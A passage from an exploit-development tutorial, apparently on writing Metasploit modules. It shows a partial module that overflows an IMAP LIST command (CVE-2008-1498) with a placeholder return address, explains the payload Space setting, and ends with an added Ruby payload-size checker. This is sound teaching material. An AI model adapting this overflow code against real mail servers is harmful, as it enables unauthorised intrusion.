Creating Your Own Exploits
        'References' =>
          [
            [ 'BID', '28260' ],
            [ 'CVE', '2008-1498' ],
            [ 'URL', 'http://www.exploit-db.com/exploits/5259' ],
          ],
        'Privileged' => false,
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread',
          },
        'Payload' =>
          {
            'Space' => 10351,
            'DisableNops' => true,
            'BadChars' => "\x00"
          },
        'Platform' => 'win',
        'Targets' =>
          [
            [ 'Windows Universal', { 'Ret' => 0xDEADBEEF } ], # p/p/r TBD
          ],
        'DisclosureDate' => 'March 13 2008',
        'DefaultTarget' => 0))
  end

  def exploit
    connected = connect_login
    lead = "\x41" * 10360
    evil = lead + "\x43" * 4
    print_status("Sending payload")
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
    sock.put(sploit)
    handler
    disconnect
  end
end
The 'Space' declaration refers to the space available for shellcode. This declaration is very important in an exploit module because it determines which payloads Metasploit will allow you to use when running your exploit. Some payloads require much more space than others, so try not to overstate this value. Payload sizes vary greatly, and encoding increases their size. To see the size of an unencoded payload, use the info command followed by the name of the payload and look for the Total size value, as shown here:
msf > info payload/windows/shell_bind_tcp

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
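The size check the text describes, as an added example that is not code from the book or from the Metasploit Framework: it pulls the Total size value out of `info` output and compares it with the module's Space and BadChars declarations. The `info` text and the payload blobs below are constructed, and the 328-byte figure is illustrative, not a real payload size.

```ruby
# Values taken from the module's 'Payload' hash above.
SPACE    = 10351
BADCHARS = "\x00".b

# Constructed sample of what `info payload/...` prints; the size is illustrative.
SAMPLE_INFO = <<~INFO
         Name: Windows Command Shell, Bind TCP Inline
       Module: payload/windows/shell_bind_tcp
  Total size: 328
INFO

# Pull the unencoded "Total size" figure out of the info listing.
# Returns nil when the line is absent so callers can tell "unknown" from 0.
def total_size_from_info(info_text)
  m = info_text.match(/^\s*Total size:\s*(\d+)/)
  m ? m[1].to_i : nil
end

# Does the raw payload contain any byte the module declared as bad?
# If so, Metasploit has to run an encoder, and the encoded blob is always
# larger than the raw one, so the raw size is only a lower bound.
def needs_encoder?(payload, badchars)
  bad = badchars.b.bytes
  payload.b.bytes.any? { |byte| bad.include?(byte) }
end

# Summarise how a candidate payload relates to the declared Space/BadChars.
# :fits_unencoded is the best case; a payload that needs an encoder may still
# be rejected once the decoder stub is added, which is why Space must not be
# overstated.
def assess(payload, space = SPACE, badchars = BADCHARS)
  size = payload.bytesize
  {
    size:           size,
    fits_unencoded: size <= space,
    needs_encoder:  needs_encoder?(payload, badchars),
    slack:          space - size
  }
end

if __FILE__ == $0
  puts "info reports #{total_size_from_info(SAMPLE_INFO)} bytes, Space is #{SPACE}"
  p assess("\x90".b * 300)          # small, clean: fits without encoding
  p assess("\xcc\x00\xcc".b)        # contains a bad char: encoder required
  p assess("\x90".b * 10400)        # larger than Space: never fits
end
```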